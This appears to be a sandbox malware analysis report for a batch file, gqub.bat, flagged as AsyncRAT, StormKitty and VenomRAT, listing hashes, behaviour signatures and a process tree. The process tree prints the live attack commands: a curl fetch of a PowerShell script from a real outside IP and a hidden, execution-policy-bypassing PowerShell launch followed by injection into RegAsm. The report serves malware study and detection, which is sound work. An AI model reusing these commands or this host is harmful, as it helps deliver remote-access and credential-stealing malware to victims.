Overview

overview

10

Static

static

1

gqub.bat

windows7-x64

8

gqub.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-01-2025 07:57

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    gqub.bat

  • Size

    3KB

  • MD5

    bb445d197063475c8d78de4f0825753c

  • SHA1

    158a8e3b278affe7c1185aad67683e4253cf53dd

  • SHA256

    7066e4a496d83ee1b677ade06c868a432bb4a0dd364b19ee184147a527b11c10

  • SHA512

    173cd8a56e2fa6e8db33bc13870f8751473251aa80be2235321e62b0f84961e9fd00a236aec63342d73f262dbc7c2a920951a1a8f41707ca6640e673f21c4307

Score
10/10
asyncratstormkittyvenomratdiscoveryexecutionratstealer

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • VenomRAT 1 IoCs

    Detects VenomRAT.

    rat
  • Venomrat family
    venomrat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\gqub.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4736
    • C:\Windows\system32\cmd.exe
      cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4640
      • C:\Windows\system32\curl.exe
        curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/vfrcxq.ps1
        3⤵
          PID:2516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2klvbn4y\2klvbn4y.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4220
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES87AE.tmp" "c:\Users\Admin\AppData\Local\Temp\2klvbn4y\CSCAC9824FFF7054DC3A13E30D512ACB598.TMP"
            4⤵
              PID:4680
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            3⤵
              PID:640
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3644

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\2klvbn4y\2klvbn4y.dll
          Filesize

          9KB

          MD5

          c4df261a9ae58c59b122f781b70be7b9

          SHA1

          791625d4f4c489553fc9caf509b0236d68769086

          SHA256

          f9d7e38779241516cde0dd57b4df2bcabca365b19c152b33eb478289fc8320fd

          SHA512

          6facf68507a8a963e741aca502aff510535940a95bb1e3f5da27a3db4f11f0a7ebb828ef86f1258ee167fc8ed2f25e0e34442c3fe953c976c5969cfac20989d1

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\RES87AE.tmp
          Filesize

          1KB

          MD5

          05bc4730b0a1bb796a290f7a8786be63

          SHA1

          a4953d68f5f69c42221f725790a9980433b1baa5

          SHA256

          40f144cd3b581530beee300fe01e63cfa03a788988db5efeb477234fec6f18f1

          SHA512

          f5bd9602562389c42277203c165e56fca62a9f3b59b8baa1955c27911e5b1347743bbdbfbb6ffeeeee6969ad9c0e62b64fd18a42f9c36ef75b704052c480f1cf

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kvzqoxms.tvk.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\2klvbn4y\2klvbn4y.0.cs
          Filesize

          10KB

          MD5

          b5c3a2d03ff4c721192716f326c77dea

          SHA1

          6b754fd988ca58865674b711aba76d3c6b2c5693

          SHA256

          ab42fe5fd08cb87663e130f99f96124fdd37d825d081b9712b0bad8b6f270fac

          SHA512

          d32e5a98c12b6b85d1913555ea54f837cd0fc647ca945aef9d75ffade06506be1f4a2348827f11c4eeae0796e4156c8f352e3c0f9a6e2cdc93cb501bcdf2c248

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\2klvbn4y\2klvbn4y.cmdline
          Filesize

          204B

          MD5

          0ee963805c9eff55930fb30aa0e8b6ba

          SHA1

          329ab0d2648179f70902bccd22d8021076b67092

          SHA256

          90606e03ea98cb65b3ce247200fd28108f3ccce133eed496aee91b7d842c32dc

          SHA512

          70b8e5062774f82053424c454ce9a0390ce3e6ecb1e739b0674b3e046da76b56d1b146bb62290d0c4f8a840f8936b1d7d794af9264f27d295e22db58c4eb6e88

          Download Submit

        • \??\c:\Users\Admin\AppData\Local\Temp\2klvbn4y\CSCAC9824FFF7054DC3A13E30D512ACB598.TMP
          Filesize

          652B

          MD5

          40f41e17b2b514c8005a46ca03e7f52b

          SHA1

          8e6aa689f664aad0b14d0536bb642a36ad4f2049

          SHA256

          7cea7cc056f9c86b048202da9bc4da7e95b2ac9976b057aad815a28e3fb71fc8

          SHA512

          ed3e8a91dbbbfb923d407f892005fd9e8c1cd9925a5b58b4cb86b2e73f91936fdaafd2332e2b45aec9d864c52e01f665828b67a3c77a71e5905c15fe30848f18

          Download Submit

        • memory/2112-13-0x00000194FE880000-0x00000194FE8C4000-memory.dmp

          Filesize

          272KB

          Download

        • memory/2112-33-0x00007FFCD54B0000-0x00007FFCD5F71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2112-14-0x00000194FE950000-0x00000194FE9C6000-memory.dmp

          Filesize

          472KB

          Download

        • memory/2112-0-0x00007FFCD54B3000-0x00007FFCD54B5000-memory.dmp

          Filesize

          8KB

          Download

        • memory/2112-12-0x00007FFCD54B0000-0x00007FFCD5F71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2112-11-0x00007FFCD54B0000-0x00007FFCD5F71000-memory.dmp

          Filesize

          10.8MB

          Download

        • memory/2112-9-0x00000194E6360000-0x00000194E6382000-memory.dmp

          Filesize

          136KB

          Download

        • memory/2112-28-0x0000019482750000-0x0000019482758000-memory.dmp

          Filesize

          32KB

          Download

        • memory/2112-15-0x0000019482510000-0x0000019482520000-memory.dmp

          Filesize

          64KB

          Download

        • memory/3644-30-0x0000000000400000-0x0000000000704000-memory.dmp

          Filesize

          3.0MB

          Download

        • memory/3644-34-0x00000000059B0000-0x0000000005F54000-memory.dmp

          Filesize

          5.6MB

          Download

        • memory/3644-35-0x00000000057F0000-0x0000000005882000-memory.dmp

          Filesize

          584KB

          Download

        • memory/3644-36-0x0000000005500000-0x000000000550A000-memory.dmp

          Filesize

          40KB

          Download

        • memory/3644-39-0x0000000006730000-0x00000000067CC000-memory.dmp

          Filesize

          624KB

          Download

        • memory/3644-40-0x0000000006360000-0x00000000063C6000-memory.dmp

          Filesize

          408KB

          Download

        • memory/3644-41-0x0000000006AC0000-0x0000000006AE2000-memory.dmp

          Filesize

          136KB

          Download

        • memory/3644-42-0x0000000006AF0000-0x0000000006E44000-memory.dmp

          Filesize

          3.3MB

          Download